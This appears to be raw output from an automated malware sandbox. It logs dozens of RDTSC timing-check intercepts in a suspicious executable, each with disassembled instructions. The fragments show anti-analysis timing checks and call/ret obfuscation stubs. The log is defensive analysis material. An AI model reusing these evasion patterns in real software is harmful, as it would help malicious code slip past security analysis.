Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A323D4 second address: A323DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A323DC second address: A323E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A32A3E second address: A32A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A32CFB second address: A32D0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F0E38E1CB1Dh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A365B6 second address: A365BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A35B72 second address: A35B76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A36D3B second address: A36D41 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A36E95 second address: A36E99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A36E99 second address: A36E9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A36E9F second address: A36EAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F0E38E1CB16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A36EAA second address: A36ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F0E3850A357h 0x0000000e push eax 0x0000000f push edx 0x00000010 jno 00007F0E3850A346h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A3CFB6 second address: A3CFC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007F0E38E1CB16h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A3D368 second address: A3D39E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0E3850A356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F0E3850A353h 0x00000012 push eax 0x00000013 pop eax 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A3D39E second address: A3D3CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F0E38E1CB26h 0x0000000b jmp 00007F0E38E1CB1Dh 0x00000010 jg 00007F0E38E1CB16h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A3D3CE second address: A3D3DE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F0E3850A34Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A40A28 second address: A40A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A40AC7 second address: A40B04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A350h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0E3850A356h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 je 00007F0E3850A352h 0x00000019 jng 00007F0E3850A34Ch 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A40B04 second address: A40B1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, dword ptr [eax] 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0E38E1CB20h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A40B1D second address: A40B96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A358h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007F0E3850A34Ch 0x0000000f popad 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 jmp 00007F0E3850A34Ah 0x00000019 pop eax 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007F0E3850A348h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 0000001Ah 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 mov di, FD93h 0x00000038 movsx esi, si 0x0000003b push 53180149h 0x00000040 pushad 0x00000041 pushad 0x00000042 jmp 00007F0E3850A34Fh 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A40B96 second address: A40B9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A40CAE second address: A40CB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A41284 second address: A41289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A41289 second address: A412A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E3850A358h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A412A5 second address: A412B8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0E38E1CB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A412B8 second address: A412BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A412BC second address: A412C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A412C2 second address: A412C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A412C7 second address: A412CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A41666 second address: A4166B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A416A1 second address: A416FA instructions: 0x00000000 rdtsc 0x00000002 jns 00007F0E38E1CB16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c pushad 0x0000000d jng 00007F0E38E1CB16h 0x00000013 jno 00007F0E38E1CB16h 0x00000019 popad 0x0000001a pop esi 0x0000001b xchg eax, ebx 0x0000001c push 00000000h 0x0000001e push esi 0x0000001f call 00007F0E38E1CB18h 0x00000024 pop esi 0x00000025 mov dword ptr [esp+04h], esi 0x00000029 add dword ptr [esp+04h], 00000019h 0x00000031 inc esi 0x00000032 push esi 0x00000033 ret 0x00000034 pop esi 0x00000035 ret 0x00000036 pushad 0x00000037 mov dword ptr [ebp+122D2F9Eh], esi 0x0000003d jmp 00007F0E38E1CB1Eh 0x00000042 popad 0x00000043 push eax 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A416FA second address: A416FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A417C6 second address: A417EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a jmp 00007F0E38E1CB1Ch 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0E38E1CB1Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A41896 second address: A4189A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A421D4 second address: A421D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A421D9 second address: A42249 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jne 00007F0E3850A34Eh 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F0E3850A348h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a push ecx 0x0000002b and edi, dword ptr [ebp+122D1CF1h] 0x00000031 pop esi 0x00000032 mov esi, dword ptr [ebp+122D35DFh] 0x00000038 push 00000000h 0x0000003a jmp 00007F0E3850A357h 0x0000003f push 00000000h 0x00000041 xor edi, dword ptr [ebp+122D2C31h] 0x00000047 push eax 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A42C08 second address: A42C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A42C0C second address: A42C86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 jnl 00007F0E3850A347h 0x0000000e pushad 0x0000000f push edx 0x00000010 sub dword ptr [ebp+122D30E9h], esi 0x00000016 pop ebx 0x00000017 adc edx, 01128500h 0x0000001d popad 0x0000001e push 00000000h 0x00000020 mov dword ptr [ebp+122D19FFh], eax 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push edx 0x0000002b call 00007F0E3850A348h 0x00000030 pop edx 0x00000031 mov dword ptr [esp+04h], edx 0x00000035 add dword ptr [esp+04h], 0000001Dh 0x0000003d inc edx 0x0000003e push edx 0x0000003f ret 0x00000040 pop edx 0x00000041 ret 0x00000042 call 00007F0E3850A354h 0x00000047 mov edi, dword ptr [ebp+122D2BD1h] 0x0000004d pop edi 0x0000004e xchg eax, ebx 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F0E3850A34Eh 0x00000056 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A42C86 second address: A42C8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A4522D second address: A45234 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A44525 second address: A4452B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A4452B second address: A44538 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A45D8E second address: A45D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A45D92 second address: A45D96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A45D96 second address: A45E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F0E38E1CB18h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 sub si, 7641h 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push edi 0x00000030 call 00007F0E38E1CB18h 0x00000035 pop edi 0x00000036 mov dword ptr [esp+04h], edi 0x0000003a add dword ptr [esp+04h], 0000001Ah 0x00000042 inc edi 0x00000043 push edi 0x00000044 ret 0x00000045 pop edi 0x00000046 ret 0x00000047 mov edi, 44069353h 0x0000004c xchg eax, ebx 0x0000004d jmp 00007F0E38E1CB20h 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 jl 00007F0E38E1CB18h 0x0000005b push edx 0x0000005c pop edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A48C47 second address: A48C51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F0E3850A346h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A49218 second address: A4927B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jne 00007F0E38E1CB1Eh 0x0000000f nop 0x00000010 add dword ptr [ebp+122DB618h], ebx 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a jnl 00007F0E38E1CB20h 0x00000020 pushad 0x00000021 mov edi, dword ptr [ebp+122D29B9h] 0x00000027 call 00007F0E38E1CB1Ch 0x0000002c call 00007F0E38E1CB26h 0x00000031 pop esi 0x00000032 pop ebx 0x00000033 popad 0x00000034 push eax 0x00000035 push ebx 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A47A4B second address: A47A6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A353h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jns 00007F0E3850A346h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A47A6F second address: A47A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A493B8 second address: A493CA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jc 00007F0E3850A358h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A4A41D second address: A4A423 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A493CA second address: A493CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A4B5A0 second address: A4B5BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0E38E1CB1Eh 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A4A423 second address: A4A4E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A34Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0E3850A34Dh 0x0000000f nop 0x00000010 push esi 0x00000011 jmp 00007F0E3850A350h 0x00000016 pop edi 0x00000017 push dword ptr fs:[00000000h] 0x0000001e mov bx, 7209h 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 jmp 00007F0E3850A356h 0x0000002e mov eax, dword ptr [ebp+122D068Dh] 0x00000034 push 00000000h 0x00000036 push ebx 0x00000037 call 00007F0E3850A348h 0x0000003c pop ebx 0x0000003d mov dword ptr [esp+04h], ebx 0x00000041 add dword ptr [esp+04h], 0000001Ch 0x00000049 inc ebx 0x0000004a push ebx 0x0000004b ret 0x0000004c pop ebx 0x0000004d ret 0x0000004e push FFFFFFFFh 0x00000050 push 00000000h 0x00000052 push ebx 0x00000053 call 00007F0E3850A348h 0x00000058 pop ebx 0x00000059 mov dword ptr [esp+04h], ebx 0x0000005d add dword ptr [esp+04h], 00000017h 0x00000065 inc ebx 0x00000066 push ebx 0x00000067 ret 0x00000068 pop ebx 0x00000069 ret 0x0000006a or bx, 0D33h 0x0000006f nop 0x00000070 pushad 0x00000071 jmp 00007F0E3850A356h 0x00000076 push eax 0x00000077 push edx 0x00000078 pushad 0x00000079 popad 0x0000007a rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A4D2CE second address: A4D2D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A493CE second address: A4944D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0E3850A346h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push ecx 0x0000000c mov ebx, edx 0x0000000e pop ebx 0x0000000f mov edi, edx 0x00000011 push dword ptr fs:[00000000h] 0x00000018 movzx edi, di 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 push 00000000h 0x00000024 push eax 0x00000025 call 00007F0E3850A348h 0x0000002a pop eax 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f add dword ptr [esp+04h], 00000015h 0x00000037 inc eax 0x00000038 push eax 0x00000039 ret 0x0000003a pop eax 0x0000003b ret 0x0000003c mov eax, dword ptr [ebp+122D0FA5h] 0x00000042 sub dword ptr [ebp+122D25A7h], ecx 0x00000048 push FFFFFFFFh 0x0000004a push 00000000h 0x0000004c push esi 0x0000004d call 00007F0E3850A348h 0x00000052 pop esi 0x00000053 mov dword ptr [esp+04h], esi 0x00000057 add dword ptr [esp+04h], 00000017h 0x0000005f inc esi 0x00000060 push esi 0x00000061 ret 0x00000062 pop esi 0x00000063 ret 0x00000064 mov di, 64B3h 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007F0E3850A34Ch 0x00000070 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A4A4E9 second address: A4A4FA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F0E38E1CB16h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A4944D second address: A49453 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A4D2D2 second address: A4D345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F0E38E1CB26h 0x0000000c pop eax 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 mov edi, dword ptr [ebp+122D2B85h] 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push edi 0x0000001e call 00007F0E38E1CB18h 0x00000023 pop edi 0x00000024 mov dword ptr [esp+04h], edi 0x00000028 add dword ptr [esp+04h], 00000016h 0x00000030 inc edi 0x00000031 push edi 0x00000032 ret 0x00000033 pop edi 0x00000034 ret 0x00000035 call 00007F0E38E1CB23h 0x0000003a or ebx, 7E361A43h 0x00000040 pop edi 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jns 00007F0E38E1CB1Ch 0x0000004a rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A49453 second address: A49457 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A4E2B0 second address: A4E2BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F0E38E1CB16h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A4D509 second address: A4D513 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0E3850A34Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A4F365 second address: A4F370 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F0E38E1CB16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A5247F second address: A52485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A504E6 second address: A50518 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0E38E1CB25h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A52485 second address: A5248B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A5248B second address: A52490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A50518 second address: A5059C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jne 00007F0E3850A355h 0x0000000e nop 0x0000000f push ecx 0x00000010 mov dword ptr [ebp+122D1BD6h], ecx 0x00000016 pop ebx 0x00000017 sub dword ptr [ebp+122D1C03h], eax 0x0000001d push dword ptr fs:[00000000h] 0x00000024 movsx ebx, cx 0x00000027 mov di, 2DB2h 0x0000002b mov dword ptr fs:[00000000h], esp 0x00000032 mov dword ptr [ebp+122D3197h], edi 0x00000038 cld 0x00000039 mov eax, dword ptr [ebp+122D0B4Dh] 0x0000003f push 00000000h 0x00000041 push esi 0x00000042 call 00007F0E3850A348h 0x00000047 pop esi 0x00000048 mov dword ptr [esp+04h], esi 0x0000004c add dword ptr [esp+04h], 0000001Bh 0x00000054 inc esi 0x00000055 push esi 0x00000056 ret 0x00000057 pop esi 0x00000058 ret 0x00000059 movzx edi, cx 0x0000005c push FFFFFFFFh 0x0000005e mov bx, si 0x00000061 nop 0x00000062 push eax 0x00000063 push edx 0x00000064 jno 00007F0E3850A348h 0x0000006a rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A52490 second address: A52495 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A52AF3 second address: A52AF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A52AF7 second address: A52B33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F0E38E1CB18h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 push 00000000h 0x00000028 cld 0x00000029 xchg eax, esi 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F0E38E1CB1Eh 0x00000031 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A55A6E second address: A55A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A55A72 second address: A55A76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
